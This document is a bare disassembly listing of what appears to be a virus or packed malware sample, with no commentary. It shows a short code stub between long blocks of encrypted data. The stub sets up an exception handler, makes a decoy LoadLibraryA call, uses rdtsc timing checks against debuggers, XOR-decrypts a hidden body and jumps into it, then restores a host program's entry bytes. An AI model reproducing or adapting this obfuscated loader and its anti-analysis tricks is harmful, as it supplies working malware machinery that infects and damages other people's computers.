dd 0E040A5B6h, 0D53F20EAh, 0E0769F7Ch, 5B4AB57Fh, 18C3A036h
dd 0FF442F7Fh, 6940A005h, 56FFB005h, 0E3899300h, 31907143h
dd 1F11A46Ah, 56FF5C35h, 86D55F00h, 0E5C016BBh, 9BC4AFC0h
dd 53C02085h, 74C529C9h, 31C016BFh, 0FF28F151h, 30C02F80h
dd 0DBEE35FFh, 0A04520B6h, 0E574240Fh, 0E5492080h, 0E0769F98h
dd 10C89843h, 0ABCBA000h
dd 0C545D7B8h, 0E0409638h, 15D02080h, 87C5A306h, 53C01690h
dd 1781A3D2h, 0E921D771h, 0D67F0485h, 486F9880h, 0ABCBA000h
dd 74523BCh, 0D3409610h, 97012352h, 69A157F1h, 56FFBC05h
dd 574F6300h, 833926CBh, 0F8132D35h, 7483978Fh, 8B097003h
dd 0B0C30841h, 971F9A81h, 14394EE9h, 0EC3A231Dh, 0EB205281h
dd 0A2CB9C4Bh, 70822394h, 1F08E48Dh, 0A1E3F977h, 0DFD0253Bh
dd 0EB0320B6h, 0D3508454h, 0D842AF40h, 2340A000h, 6B2BEF0Bh
dd 0DE281D8Dh, 0EB3C20B6h, 4C8993DFh, 66B241BCh, 0E237DA3Ch
dd 5C6A00ACh, 0DCACD45Ch, 5C1D54AEh, 3A8D500h, 5DC1AB49h
dd 0E005F845h, 33FD2BF4h, 0EF40F243h, 9F3F1305h, 0DD432BFFh
dd 238E69D7h, 1F66240Fh, 37FDDF7Fh, 0EF0EF543h, 9F3F3B04h
dd 0A3179DFFh, 0E4CF12B3h, 1FBF5F10h, 349370BDh, 0E5C4AF4Fh
dd 533FDF7Fh, 1E6D48DBh, 70B5DF7Fh, 1FBC5AE8h, 9EE1C87Fh
dd 644F5FFFh, 9F3FDE6Ch, 0F6A87233h, 88C02080h, 1FBF5F63h
dd 60C02068h, 0DC1FD00h, 60F613D3h, 0E0437BE9h, 523F4480h
dd 0DFD8158Bh, 0E9A420B6h, 0DEC1C622h, 0E5CF7ACDh, 0E040A3C4h
dd 63FC7E0Bh, 0DBC1C6DEh, 0E5CF65D0h, 0E040A3B4h, 60D66377h
dd 0EF40A020h, 60C38705h, 0BC035600h, 0FD442F82h, 6B40A003h
dd 0C0FD28C3h, 0EFE000A0h, 60C3AF04h, 0C0609D00h, 0E4CF00A0h
dd 0E040A384h, 9F3E9968h, 99C2AFFFh, 0E3C02083h, 0D67F7CA5h
dd 224B2080h, 0F00A2B08h, 64B3E1ABh, 0E5AB6033h, 2A49E883h
dd 40C52910h, 63C016BFh, 0E0F8AC4Ah, 31C02180h, 1FA730E8h
dd 0C355107Fh, 51409638h, 0C47510A0h, 8A409638h, 3809DEA0h
dd 96A8B478h, 0E53FDF67h, 22D4AFD2h, 0F5F1C253h, 0E07698A5h
dd 0E537C56Bh, 0E07698A5h, 61C02080h, 65B78274h, 60F61825h
dd 0E040A003h, 0C5412CF5h, 0E07698A5h, 9B3FDF7Fh, 6DC1AAEBh
dd 60F61825h, 0E840A000h, 60C026E8h, 0E628F900h, 38C02080h
dd 1FA788E8h, 0FD45AA7Fh, 66409638h, 585D0A04h, 65C8A036h
dd 60F6181Dh, 65B740E2h, 60F61825h, 0E040A008h, 0DD4029F5h
dd 0E076989Fh, 97055481h, 0D6780585h, 60C02080h, 605BD408h
dd 56F8BD3Dh, 5034A500h, 585E9D00h, 9445A036h, 0FF7DA027h
dd 0E5409638h, 0E537BEF4h, 0E07698A5h, 0E0C02080h, 5DC0A974h
dd 60F6181Dh, 63C9D702h, 56FFC025h, 0E7A8A000h, 883FDF73h
dd 1FBF5D61h, 60C25068h, 7CDD2B00h, 63C016BFh, 0D67F009Dh
dd 9CB9C880h, 644F5FFFh, 60C022D0h, 0DFD8158Bh, 3E4B20B6h
dd 89EA33Ch, 9F3FDDFAh, 0E27A220Fh, 2A412080h, 0E040C024h
dd 323EAB60h, 0F43AA356h, 97D05A83h, 0D6780585h, 60C02080h
dd 6954D510h, 56FFC43Dh, 50F52D00h, 0EBC016B8h, 0D650C78Dh
dd 3764D380h, 0E04A8CB9h, 6075AD80h, 13409610h, 83C09125h
dd 17E45302h, 56F88505h, 0E040A000h, 0CE442F90h, 1F40A000h
dd 0D62808F3h, 6BBF5FEEh, 56FFF415h, 0EF922500h, 60C0B804h
dd 78F52B00h, 0EBC016BFh, 0AAC1B04Ah, 60C040A4h, 0E80A8BE0h
dd 0A9F322F3h, 0DB54D203h, 56D0470Dh, 87CD2B00h, 12C01690h
dd 0C47C2B56h, 70A78503h, 6340A036h, 60C04727h, 9ACBA000h
dd 688A2188h, 17C75703h, 5F6CA50Bh, 65B7A036h, 60F61825h
dd 0E040A040h, 783722F4h, 0C94CD203h, 8075A9B0h, 6B40963Fh
dd 50C108F3h, 0D8E525F7h, 608020B6h, 0E234A000h, 88913877h
dd 1FBF5C49h, 63CCCBD9h, 926B8873h, 9396718Ch, 6D19FFA4h
dd 56F89035h, 4FD2900h, 93C016BFh, 0EF1EFFA4h, 0E74DB2B1h
dd 0E040A0D3h, 5863B5BAh, 0E635A036h, 36B8F2E9h, 0B0C8B234h
dd 0BA60C870h, 6B1A5FFFh, 2AC32CCAh, 45C55710h, 60C016B8h
dd 6D50A000h, 73B525C1h, 0DFA02D89h, 0E5C320B6h, 0E076B067h
dd 60A78703h, 0CB40A000h, 0E74908C3h, 0E040A052h, 5CA0A577h
dd 0E041A036h, 67B42080h, 4048E3C7h, 97608020h, 0D6780585h
dd 60C02080h, 0B247D480h, 9F375A68h, 6DCBFAFFh, 60F61F60h
dd 0ABC9A5E3h, 0EBCDCBA8h, 0D67F7C8Dh, 8BC2C380h, 0C80B2B03h
dd 5865A577h, 0E043A036h, 74B42080h, 0DFA4258Bh, 0EDC320B6h
dd 0E0769FD0h, 5F0CA583h, 0E841A036h, 0EBD06A0Bh, 0D67F3C85h
dd 688A1980h, 0AAC9A373h, 70822188h, 0E018C383h, 5F64A50Bh
dd 5028A036h, 61C020A8h, 0E119A842h, 0F54A70C3h, 0E07698A3h
dd 5865A577h, 0E040A036h, 66B43080h, 0F0272D03h, 607620B6h
dd 0D8E525F7h, 60C020B6h, 0F435A002h, 0E537E67Eh, 0E07698A5h
dd 60C42080h, 55CAA675h, 60F61824h, 0D8E525F7h, 20C020B6h
dd 0EB35A000h, 0A2C2270Ah, 296A2AAh, 0EAC9CB77h, 4A829207h
dd 9722F682h, 6B247233h, 624F44A2h, 9CFD2358h, 60C016BFh
dd 1A9E240Fh, 0D53FDF7Fh, 0E0769F98h, 5B12B57Fh, 55BFA036h
dd 60F61F14h, 0DB0635FFh, 0ED4D20B6h, 0E0769F80h, 5F48B50Dh
dd 0B211A036h, 0D53F20EAh, 0E0769F7Ch, 5B06B57Fh, 55BFA036h
dd 60F61FFCh, 0DB0635FFh, 0D54D20B6h, 0E0769E68h, 5FB8957Fh
dd 1F16A036h, 56FBE215h, 9CE52300h, 60C016BFh, 0E04048C3h
dd 0A9D2080h, 50AD2101h, 38C016B7h, 6581AFF0h, 60F635F4h
dd 63836085h, 6F30DF48h, 0F53425C1h, 5D0320B6h, 0E06AA010h
dd 0E1A63CF5h, 8C4C847Ch, 0D355F1h, 1FBF64E8h, 88C5557Fh
dd 1FBF5AD4h, 9F3FF268h, 1F6EC1FFh, 549658ADh, 0E0651812h
dd 88A02080h, 1FBF5FA5h, 244B19F5h, 55CD9024h, 60F61EE8h
dd 8648F08Bh, 62C61A01h, 88168573h, 603F2080h, 0E02A648Bh
dd 0F53F70D2h, 0E0769C12h, 0E1C8E403h, 0DF7FFC3Eh, 0E3C355DCh
dd 61A8A4C6h, 883FDF7Ah, 1FBF5F7Fh, 1478E3E1h, 0B40A000h
dd 60EF9831h, 0FDA8A000h, 0A2C02080h, 0D0F8A020h, 88C02080h
dd 0E040A010h, 0D8C00442h, 0E040A185h, 60C02368h, 0E06C6200h
dd 6CE4740Dh, 18C38ECDh, 0D95C80h, 0E040A0E8h, 4494AB80h
dd 0FACBFD30h, 5847CD01h, 5AA8A036h, 13FDF61h, 0E140A4C2h
dd 62C62385h, 0AD5FFF07h, 0E842D08Bh, 0FFFFBAD4h, 90A3h
dd 1CDh dup(0)
dd 6FD70000h, 7C81h, 13DBh dup(0)
; =============== S U B R O U T I N E =======================================
public start
start proc near
call loc_3143200F
call sub_3143208F
jmp near ptr byte_3143203F
start endp
; ---------------------------------------------------------------------------
loc_3143200F: ; CODE XREF: start�p
push dword ptr fs:0
xor ds:dword_31432040, esp
mov fs:0, esp
xor eax, eax
push 20h
push eax
push eax
push eax
push 80000000h
push eax
push 2000h
push eax
push eax
push eax
call ds:dword_3142808C ; LoadLibraryA
; ---------------------------------------------------------------------------
byte_3143203F db 0BCh ; CODE XREF: start+A�j
dword_31432040 dd 12FFBCh ; ---------------------------------------------------------------------------
sub eax, eax
loc_31432046: ; CODE XREF: UPX2:3143204C�j
dec al
or al, al
jz short loc_31432050
jnz short loc_31432046
jmp short loc_314320B7
; ---------------------------------------------------------------------------
loc_31432050: ; CODE XREF: UPX2:3143204A�j
call sub_3143208C
add ebx, 47h
sub ebp, ebp
xor ebp, 28B0h
cld
mov edi, 0C5h
cld
cld
push ebx
loc_3143206C: ; CODE XREF: UPX2:3143207F�j
mov al, [ebx]
sub ax, di
cld
mov [ebx], al
inc ebx
add di, 62h
sub ebp, 1
or ebp, ebp
jnz short loc_3143206C
pop ebx
pop large dword ptr fs:0
pop edi
jmp ebx
; =============== S U B R O U T I N E =======================================
sub_3143208C proc near ; CODE XREF: UPX2:loc_31432050�p
pop ebx
push ebx
retn
sub_3143208C endp
; =============== S U B R O U T I N E =======================================
sub_3143208F proc near ; CODE XREF: start+5�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_3143208F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dword_3143209C dd 0E8h, 24048B00h, 0E39889FCh, 0F700002Fh, 28A080h, 0
; DATA XREF: UPX2:31435084�o
db 80h, 8Bh, 5Ch
; ---------------------------------------------------------------------------
loc_314320B7: ; CODE XREF: UPX2:3143204E�j
and al, 4
jz short loc_314320E7
pop ecx
mov [eax+2FE7h], esi
mov [eax+2FEBh], edi
cmp byte ptr [eax+28A4h], 0E8h
jnz short loc_314320DE
add ebx, [eax+28A5h]
mov ebx, [ebx+2]
push dword ptr [ebx]
jmp short loc_314320E6
; ---------------------------------------------------------------------------
loc_314320DE: ; CODE XREF: UPX2:314320CF�j
mov ebx, [eax+28A6h]
push dword ptr [ebx]
loc_314320E6: ; CODE XREF: UPX2:314320DC�j
pop ebx
loc_314320E7: ; CODE XREF: UPX2:314320B9�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 80A1h
sub ebp, 361005h
mov edi, [esp+4]
lea esi, [ebp+3638B0h]
mov ecx, 0
rep movsb
call sub_3143215C
mov ecx, eax
call sub_3143215C
sub eax, ecx
jz short loc_31432130
cmp eax, 100h
ja short loc_31432130
lea eax, [ebp+3610D3h]
mov dl, [eax-10h]
call sub_31432160
jmp short loc_3143216F
; ---------------------------------------------------------------------------
loc_31432130: ; CODE XREF: UPX2:31432117�j
; UPX2:3143211E�j
test dword ptr [ebp+3638A5h], 80000000h
jz short loc_3143215A
lea esi, [ebp+3638A9h]
mov edi, [esp+4]
movsb
movsd
mov esi, [ebp+363FECh]
mov edi, [ebp+363FF0h]
mov ebx, [ebp+363FE8h]
loc_3143215A: ; CODE XREF: UPX2:3143213A�j
pop ebp
retn
; =============== S U B R O U T I N E =======================================
sub_3143215C proc near ; CODE XREF: UPX2:31432109�p
; UPX2:31432110�p
rdtsc
retn
sub_3143215C endp
; ---------------------------------------------------------------------------
db 0A8h
; =============== S U B R O U T I N E =======================================
sub_31432160 proc near ; CODE XREF: UPX2:31432129�p
mov dh, dl
mov ecx, 27D2h
loc_31432167: ; CODE XREF: sub_31432160+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_31432167
retn
sub_31432160 endp
; ---------------------------------------------------------------------------
loc_3143216F: ; CODE XREF: UPX2:3143212E�j
sub [ebx+0FB750F8h], esi
sbb [ebx], edi
cmpsb
les edx, [eax-77h]
sti
inc esp
rol byte ptr [ecx], 1
retn
; ---------------------------------------------------------------------------
dd 0C82079D0h, 0AB4BF705h, 6E5CFB13h, 0ED506031h, 182B1425h
dd 63939B88h, 0C26B18E2h, 7973DB28h, 0AEE37B7Dh, 1CC260F1h
dd 8969CD40h, 0CB6F5DC8h, 4DD49C11h, 0B5197212h, 0ACEC1153h
dd 71A4AABBh, 7F2F8BD3h, 124B5674h, 839BBB0Ch, 5B03DF84h
dd 48A0F4B8h, 872CDBF0h, 0E9A85DE3h, 4DECBC5Eh, 1EDF2BD0h
dd 53869DF9h, 588B826h, 0EB0058B0h, 3CC19D22h, 8D36DD95h
dd 88A14CFEh, 0A1562763h, 0FE1B3255h, 68CDF070h, 6D27B810h
dd 0DB6114C4h, 3AD2BD24h, 0BB40EA9Fh, 0D69EE6Fh, 28B6E37Eh
dd 0C823BB38h, 67009D70h, 0F79FBB94h, 3DFF084Fh, 4896C31Eh
dd 6D4F5875h, 88E03B11h, 3DAC65B0h, 0BD2178E6h, 8075E764h
dd 0F6608E2Fh, 9E15743Dh, 0CC257750h, 340AEE5h, 0C45BB97h
dd 2880EE25h, 0DD54DD53h, 0EBC01846h, 3E75C0B5h, 0D8358B0h
dd 4896ED2Ch, 6D86CFF0h, 88D62A41h, 7A355131h, 45204EEBh
dd 5ED5E8C5h, 85A98B10h, 9E3B060Dh, 0A0804950h, 0E8409B7Ch
dd 1675C7CFh, 0E980EE0Bh, 4C2F6738h, 68C018A4h, 6274FF9Bh
dd 0C0C35BF0h, 40A0E850h, 0D3161D79h, 818838A6h, 4280D840h
dd 1EB587D0h, 0EDC02E4Bh, 0E6E4B7D0h, 3F0058B2h, 58A04DDDh
dd 7CB98C6h, 88EC3B29h, 286D5930h, 45204EC0h, 5ED249E5h
dd 0F7C54B10h, 88ECDB52h, 40CA04DBh, 651958C3h, 0BEFB0105h
dd 0A32B2B30h, 0D877F12Ch, 3FDC5F8Eh, 960BB78h, 0FE95A7B0h
dd 0CBA0CE6Bh, 28C5B834h, 8A7FBC9Fh, 4217D830h, 0A02112D0h
dd 0E8C01C70h, 960B878h, 0FE95A7B0h, 0CDA0CE6Bh, 6AC49730h
dd 0E2E03892h, 28E88830h, 0A2207CD0h, 6428D970h, 5861D247h
dd 0A90059D8h, 1E350750h, 8040AECBh, 88E1389Ah, 13D64DCFh
dd 0CDC878E6h, 81C01870h, 860BA41h, 4B5958DAh, 0B7AA925Ah
dd 0DE7B5265h, 4B11D390h, 13F665B3h, 0C72078E6h, 68C22CF4h
dd 8665010h, 0FC4E58B0h, 48ECB414h, 0D3D20D0Fh, 3D6D38A6h
dd 28B6CFFAh, 75ADB1E3h, 68F623AEh, 0E0F3B6A1h, 0A8005AC4h
dd 74B245D3h, 0E74098C6h, 88E23814h, 0CA055330h, 37204EEBh
dd 0ED4F1900h, 8568FECh, 93FADD3Bh, 385FF866h, 0A1C517F1h
dd 3E00EA8h, 1EBB3EB5h, 0C95087D0h, 50909DFFh, 85EBB826h
dd 0A836635Ah, 395FE2B3h, 0B5C517F1h, 3E00EA8h, 1EBB2ABDh
dd 37299BD0h, 0ED4F1901h, 856807Ah, 0A801E058h, 201D7550h
dd 6340AECCh, 7EE0525Fh, 2CF027E9h, 0A2239953h, 3F391B30h
dd 100AB87Ah, 0BDD7ED3Dh, 5119F866h, 654098F0h, 771E7594h
dd 83E627CFh, 0C86D7C5Dh, 0EC01870h, 0C2735BBh, 25E46A1Bh
dd 7E9BECC5h, 612634F0h, 0B4B5E92h, 0DD62DAF2h, 0C84AAC5Bh
dd 68B01118h, 62AC3310h, 0C2C4D3B0h, 48A09050h, 0A82A90F0h
dd 868A6AC1h, 0C6152760h, 90204EEBh, 80DCF3h, 860C819h
dd 0A86A8C3Bh, 8CA34DBh, 0EA2A989Ah, 0E0E052C2h, 2880A839h
dd 0A27178BAh, 0FD3F488Fh, 85683E6h, 578501EFh, 49A77C5Fh
dd 5DCD98F0h, 88D62890h, 288CDB89h, 3BCFF3D0h, 682D99D5h
dd 85608E00h, 9E146F35h, 18400750h, 8260F2A4h, 7675C76Fh
dd 0AD80EE0Bh, 0FC552710h, 68C15698h, 8715010h, 0CD5358B0h
dd 3DC29D14h, 8132C897h, 0ED8C51E6h, 7F80BD57h, 0C8253738h
dd 475E770h, 0F7608E2Fh, 9E3BDA25h, 0DD5FAF50h, 0E876A3B6h
dd 8A8A38FAh, 13F64DCFh, 0E09978E6h, 0FFC01871h, 4E9593Bh
dd 57570C94h, 7E9B42C5h, 6BB6ABF0h, 0BEDC6E35h, 7FD4D830h
dd 0F39EED2Fh, 0A8451846h, 8B26DE64h, 46725C4Eh, 40848CAFh
dd 0C22A989Ah, 0B356AD6Fh, 0E805D806h, 20B3A4A4h, 68C01DF7h
dd 0EBF17123h, 0FE85618Ah, 3DA0CE6Ch, 0CC3C19C2h, 0FA935BB4h
dd 0A9A8AC43h, 0C82EE511h, 38944870h, 5830E946h, 0C695A7E3h
dd 0CDA0CE6Bh, 0E734C130h, 80C44C6Fh, 14D65DBFh, 0DC878E6h
dd 3B3FE78Dh, 33262DEFh, 26EB5886h, 49883CD1h, 171798F0h
dd 0BEDB7E05h, 6E152730h, 21204EEBh, 973FE318h, 80AE210h
dd 0A86A58DAh, 49C8F83Ah, 63409CF0h, 0D8E05254h, 0EC0BD45Ah
dd 0B0769A2Fh, 68C02C2Fh, 0D2887123h, 25FFA74Fh, 7EB5BEC5h
dd 0B911CAF0h, 0C275C7C0h, 0AB80EE0Bh, 58E35814h, 68984028h
dd 8608819h, 0A80056D8h, 48A0F851h, 0E84098F0h, 88E03890h
dd 2880F095h, 0C82078D0h, 97934E21h, 3E5BEA85h, 459F3B0h
dd 0B3D538D4h, 65837612h, 0BEF94905h, 0BD7F8A30h, 0C816437Ah
dd 57AC9DF9h, 1E88B826h, 0E40058B0h, 3DCB973Fh, 8132C880h
dd 0ED8C51E6h, 49D6BD57h, 89450DBCh, 0FD3F4870h, 8568342h
dd 9770DD39h, 1463F866h, 8D33F9B2h, 0ED8D59DEh, 42E29754h
dd 0BB541BB5h, 3BB44E2Ch, 814DB75h, 0DA742BDCh, 48CE9D3Ch
dd 8925EAB3h, 0E1A65DE4h, 28C1BD5Ch, 0A9450A93h, 1867D04h
dd 692DDD7Ch, 0C66928C0h, 0BA0B937h, 9C21FD82h, 0E79268F5h
dd 5BF3BD53h, 0BA637891h, 0DB47915h, 670DDD42h, 0C0543DC4h
dd 2CC19D22h, 8D32DBF0h, 0DC854CF1h, 49E5AA58h, 0BA6378B4h
dd 0DB47915h, 640FD744h, 0D86C3DD8h, 26F3CA63h, 8033E891h
dd 0CDE04CFFh, 7CF4B148h, 0A9450AB8h, 1861814h, 6134DD7Ch
dd 0C7543DDDh, 3CD38103h, 8114F595h, 0CEE05DFDh, 64E5BD42h
dd 0A9521AB9h, 2FC06102h, 6126CC75h, 0DC413DDCh, 2AC98A24h
dd 9B25EC85h, 0EDA738D1h, 44E99E44h, 0B2492BB5h, 0D871815h
dd 6409FE64h, 0C5690CD5h, 2DE7F835h, 8C2FD584h, 0C08554E5h
dd 44E4B651h, 8F2039B5h, 0D946C15h, 6126C87Dh, 0C94E3DDCh
dd 48E19D3Dh, 0BC34FDB7h, 0D89055F5h, 69E8AC51h, 0BC453FD0h
dd 1BB27D26h, 80ED779h, 0FE743DF7h, 21D38A35h, 9005F69Fh
dd 0EDA738D1h, 44EF8E44h, 814515A5h, 1AAF7E1Eh, 6114D97Dh
dd 0A84136DFh, 2CC1971Ch, 9A22F1BCh, 0C9994AF1h, 58E19530h
dd 0BF451186h, 1867E3Fh, 4760DD7Ch, 0EE6E3DC0h, 5C59439h
dd 8130E891h, 88A15FFEh, 46E5A87Fh, 0AB4F0A80h, 68B36B15h
dd 6B0FCA40h, 9B732BD5h, 3AC9BE62h, 0B840EC83h, 0ED8357E2h
dd 1AB3AB43h, 0BC581D9Eh, 1CA54B70h, 6D0CD156h, 0DA742CF1h
dd 3CD59A39h, 0E801EB95h, 0CE945DC3h, 7CE5B459h, 0C84515B9h
dd 0DA57423h, 7133B860h, 0C5652CC3h, 2DCD9104h, 8106F7A4h
dd 0E1B45DFCh, 7D80BD5Dh, 0B84115BEh, 1FA57126h, 6126DE5Fh
dd 0FE003DDCh, 3DD48A39h, 8401F491h, 888357FCh, 5CE9AA67h
dd 0A4493EB5h, 1C8E1815h, 7D0ADC51h, 0DA502CC3h, 24C98E39h
dd 9B25FF95h, 0ED8B57C4h, 5CCED85Eh, 0A9450A93h, 1867D04h
dd 4660DD7Ch, 0CD721BC4h, 18C58C31h, 8D23F782h, 0C6E04BE3h
dd 4DF29B44h, 98450CB1h, 0DA37702h, 7025CB63h, 0EB7416B0h
dd 3CC19D22h, 8B25CB95h, 0E68F51E4h, 6BF49630h, 0BC411DA2h
dd 0DB34D15h, 6712E862h, 0DB733DD3h, 5D4B650h, 8116E891h
dd 0EEAF4FF5h, 5CE3BD63h, 0C84E17B9h, 188F6C3Eh, 6126D675h
dd 0E6003DDCh, 2DD0B724h, 8732C89Eh, 0FB935DF3h, 4DEBB764h
dd 0BC6E78BEh, 6A5683Fh, 7C03DD43h, 0A86E37D9h, 3AF08C1Eh
dd 8B25EC9Fh, 0FA896EE4h, 44E1AD44h, 0A74D1D9Dh, 26C06102h
dd 6D15E964h, 0C64921C2h, 25D29736h, 8729EC91h, 0E38F6CFEh
dd 6680B655h, 0A1522FA4h, 1967D04h, 6915CC62h, 0C56515DCh
dd 48D98A3Fh, 0BD2CECA2h, 0E78351FEh, 5CD3BD54h, 0AF4E11A2h
dd 6817724h, 7C33D163h, 0CF6E31C2h, 9F3AF50h, 9A21ECA3h
dd 88904DE4h, 5BEFB453h
dd 0AB4F0BB5h, 68B47D1Bh, 660ED773h, 0A8743BD5h, 20D49D37h
dd 8A34EB9Fh, 0E58156E9h, 4DF2D855h, 0BB200EB3h, 68A47615h
dd 6303D763h, 0E1002CD5h, 3AC58C3Eh, 0AB34FD9Eh, 0ED9357FCh
dd 4CEEB978h, 81201DBCh, 1AA56C1Eh, 4F14DD7Eh, 0C7432CD5h
dd 2BC5963Eh, 0BB24FD84h, 0ED9459E4h, 5CEE9130h, 0AD4E0AB5h
dd 0DB05704h, 4160F97Eh, 0DA652CDEh, 7D49D3Eh, 0BD2EFD80h
dd 88A154E2h, 4DF4B679h, 0BC4516A2h, 0CA17D22h, 6D0CD156h
dd 0FE4419B0h, 7BE9A811h, 0A404B6C2h, 0EDB238DCh, 47EC9B57h
dd 0AD6B1DA3h, 0D921809h, 6D10F777h, 0D16513DEh, 48E18015h
dd 0B927FDA2h, 0F1925DE5h, 5DECB966h, 89583DB5h, 0FA54A70h
dd 5E14DD43h, 0CD7534D1h, 48E18015h, 82B6ABA6h, 3B66E92h
dd 7A81B2E4h, 9E380A2Fh, 57B08D8Fh, 0CCEBB826h, 0F8560EE6h
dd 50D00706h, 0D39E0D0Fh, 4C6338A6h, 20428620h, 3369F5D0h
dd 91D05Bh, 0E060B810h, 0AB24143Dh, 4DCAF83Ah, 8213C8A1h
dd 0D82CB395h, 7CD00CBBh, 9A7138BAh, 6E55E723h, 8B608E2Ch
dd 3DFF5474h, 4896C45Eh, 2B485C73h, 0B3F4AD1Dh, 0E1B3D806h
dd 0A07278BAh, 68F21840h, 59317C9Bh, 0F95018DAh, 8823E03Ah
dd 0E62ACCF8h, 8A75C7C0h, 0AB80EE0Ch, 1A135814h, 0F1CFD8F5h
dd 50BA4FD2h, 0FFC39A93h, 89480763h, 0E7BF670Fh, 88E09D14h
dd 21E88830h, 432078A0h, 0E3C072A4h, 6020D2DCh, 0A81058B0h
dd 22F2FA3Ah, 9849F0F0h, 888A3890h, 0D7D08B61h, 0FE1B8E45h
dd 97994770h, 3E5BFE85h, 0DCFFDDB0h, 342D7321h, 0B40AEE5h
dd 8875B59Ch, 2B80EE20h, 37732F01h, 8A4593A2h, 85608E2Bh
dd 0A827A33Fh, 0B78B1050h, 6DCB670Fh, 88D6036Ah, 0C857BDh
dd 0D2C878D0h, 0E33FE78Fh, 3E5B5E95h, 0E78FD5B0h, 0A0A0F878h
dd 17BF67F9h, 0B30ABD1Bh, 0E805D806h, 47AD58A4h, 68C0302Ch
dd 0F79E4CF8h, 5A85D34Fh, 0CDA0CE6Bh, 654BEC30h, 88C8511Fh
dd 0D65F3030h, 0FAB872Fh, 8095DB2Fh, 860B810h, 0B8EDD9EDh
dd 7BA0CE4Bh, 75C51539h, 0D9E00E8Eh, 78D18964h, 5DDF2981h
dd 68F62302h, 0F744BC97h, 9E3B1E25h, 4C62A550h, 0E8A8CDF0h
dd 0D5E03890h, 33BF35B1h, 374A78E6h, 73CA8DFDh, 5A30B826h
dd 0A824787Dh, 8C23F87Ah, 6D87FEFCh, 88D623C0h, 0AD47F8FDh
dd 0C8166382h, 68EA1854h, 120A7B4Dh, 0A809B0E8h, 0A2DF850h
dd 21BE3291h, 0E123C8E5h, 1EBCB8A5h, 0C0A47DD0h, 0FD495A78h
dd 8568470h, 0FDC3BA47h, 48A0F8B8h, 5C1C5F0h, 88D62309h
dd 14E445BBh, 0B4A378E6h, 67C01054h, 8600194h, 0A0ECD9B0h
dd 1CA0F852h, 0E8419C98h, 1275C790h, 0A380EE0Bh, 0ECA4F52Ch
dd 68C01974h, 0E060D240h, 0A80058B4h, 48F2AA06h, 7ED567A7h
dd 0BBE00EABh, 2C1755F9h, 992078D1h, 39C27221h, 808B97Ah
dd 0FA4058B0h, 73C26DAFh, 6DD698C6h, 0D8BB4C66h, 2984B064h
dd 377778D0h, 6AE03CC4h, 9D9FB810h, 0A83664F2h, 3C607D09h
dd 0B8547BE6h, 888AEC1Bh, 7ED78962h, 0F3FAED2Fh, 0ED991846h
dd 5EB0CDD0h, 9346CD4Fh, 1F2DF866h, 8217CAB4h, 1F6D60D4h
dd 2880D934h, 0A2E04B7Bh, 0C3334160h, 5830E840h, 0FA5008E0h
dd 73CA6DAFh, 2CC198C6h, 88E03A98h, 20A4ACCFh, 0F412ED2Fh
dd 97931846h, 3E5C8A85h, 0ACC205B0h, 429E7850h, 63069985h
dd 0BEF5401Dh, 0A5993B30h, 0FE307845h, 3E111B70h, 0C8E46AEFh
dd 0A91FD0BFh, 0CCAFF850h, 0E84099E0h, 0FDDA0610h, 16009E20h
dd 0C9A477D0h, 0E8C01871h, 0F915982Eh, 0F83ED9F6h, 3DE7B619h
dd 2E8F13B2h, 0A3AF39D6h, 28EA89FEh, 37732E81h, 5EFC32E5h
dd 0C95BE110h, 0A8DFDDBFh, 0CD2DF850h, 0E8768661h, 848838FAh
dd 7880D830h, 0E2B58783h, 55C02E4Ch, 860B81Ch, 0A8BFDDBFh
dd 0F949F850h, 694098F0h, 0C1B268AEh, 8D05D766h, 4B2078D0h
dd 546C10B6h, 91E4B71Dh, 940058B0h, 0E4538D70h, 6D4FA2CCh
dd 88E0381Ch, 8A0D59Dh, 0E91D58F0h, 1DB47D17h, 285C146Fh
dd 0D68124C5h, 3CC8D8AFh, 6931ED84h, 0B2903BEEh, 40F5F71Fh
dd 0C8DF3F16h, 787A297Fh, 0FF60B837h, 3DFF0A52h, 4896C39Ah
dd 0B81058C3h, 810868C0h, 6C80D830h, 0A44E0FBFh, 68A4791Fh
dd 345A2DEFh, 68855886h, 8193CE24h, 0D4241D79h, 0E0B138A6h
dd 0A880DA30h, 98762981h, 54FE8D8Fh, 9DEDB826h, 0A8364323h
dd 1C69CB00h, 0B912C8A1h, 0FA75C7C1h, 0AF80EE0Bh, 5DDF5CD4h
dd 68F62336h, 85E07BE8h, 0A8364DDBh, 22630151h, 1741F2F1h
dd 8C93C7A3h, 9500CDCFh, 0C81638D8h, 0ED9E6C71h, 3B3ACCD0h
dd 1BD0D36Bh, 74F0FB5Bh, 0F5F72D7Dh, 326B38A6h, 2880D93Ch
dd 0C928F25Bh, 90C31870h, 8300733Bh, 0C9A6AB7Bh, 0AAE7FD24h
dd 6B6E7305h, 3B33757h, 0FC0B8FFCh, 884A2C80h, 97AA4A21h
dd 34662DEFh, 258B5886h, 4896C32Ah, 0C34C5C73h, 8F09BB5Fh
dd 28EADFF7h, 87A97838h, 2793DB73h, 4937EC56h, 0E55C1DE2h
dd 27D29B39h, 9C26F783h, 0E6896FCCh, 5BF7B754h, 0BA553B8Ch
dd 1CAE7D02h, 7B12DD46h, 0F46E37D9h, 24D08015h, 9A25EA9Fh
dd 0FA816C90h, 60F4BD57h, 0C8540BBFh, 38C01872h, 0D8EFCA45h
dd 0CC632AD9h, 2DC9827Eh, 8430B696h, 0CBA97690h, 41EDF87Bh
dd 0AC550BA0h, 3DCA7612h, 2832FD43h, 0E14F12C4h, 3E86D81Eh
dd 9D34EA99h, 88086D9Ah, 7580D830h, 0D6839551h, 0ED061846h
dd 856AD7Bh, 3695A7B0h, 89A0CE6Bh, 0D4348718h, 3D6B26FAh
dd 28B6E366h, 0E61CD489h, 0E9A63205h, 7D7D472Eh, 0F2BDD593h
dd 0C3A0CE6Ch, 4D179A86h, 0D6D9DF6h, 28B6EFE1h, 0FFD7FD5Fh
dd 0E13A1846h, 46EC4256h, 0A9B1A34Eh, 294B37B2h, 17BB8718h
dd 0AC9CBB6Fh, 7DF5DC38h, 8828FD16h, 80C01846h, 860B818h
dd 86431EE3h, 48ECB414h, 0D3EA0D0Fh, 48EB38A6h, 4213CF44h
dd 5DDF2BD2h, 68F62322h, 147895h, 0E808DD4Eh, 985FF866h
dd 16C47063h, 8308C76Fh, 7B80D830h, 877F3B96h, 24843623h
